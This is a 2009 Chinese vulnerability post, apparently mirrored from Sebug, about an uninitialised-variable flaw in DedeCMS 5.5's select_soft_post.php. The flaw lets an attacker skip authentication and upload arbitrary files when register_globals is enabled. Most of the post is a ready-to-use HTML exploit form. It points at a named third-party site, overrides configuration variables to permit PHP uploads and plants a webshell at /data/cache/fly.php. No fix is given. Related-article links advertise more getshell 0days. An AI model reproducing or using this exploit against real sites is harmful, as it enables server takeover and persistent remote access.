织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

2009, October 26, 6:56 PM. 漏洞集研
Submitted by admin
发布时间:2009-10-20
影响版本:
Dedecms 5.5
漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。
<*参考
by:Flyh4t
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html>
<head>
 <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
 ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
 <form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  <input type='hidden' name='activepath' value='/data/cache/' />
  <input type='hidden' name='cfg_basedir' value='../../' />
  <input type='hidden' name='cfg_imgtype' value='php' />
  <input type='hidden' name='cfg_not_allowall' value='txt' />
  <input type='hidden' name='cfg_softtype' value='php' />
  <input type='hidden' name='cfg_mediatype' value='php' />
  <input type='hidden' name='f' value='form1.enclosure' />
  <input type='hidden' name='job' value='upload' />
  <input type='hidden' name='newname' value='fly.php' />
  Select U Shell <input type='file' name='uploadfile' size='25' />
  <input type='submit' name='sb1' value='确定' />
 </form>
 <br />It's just a exp for the bug of Dedecms V55...<br />
 Need register_globals = on...<br />
 Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
SEBUG安全建议:
暂无
请关注官方补丁
// sebug.net [2009-10-26]

« 上一篇 | 下一篇 »

只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27862, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35444, 评论: 0)
dedecms默认的注册用户 (浏览: 12968, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13760, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16389, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37599, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22239, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11171, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10277, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 18106, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):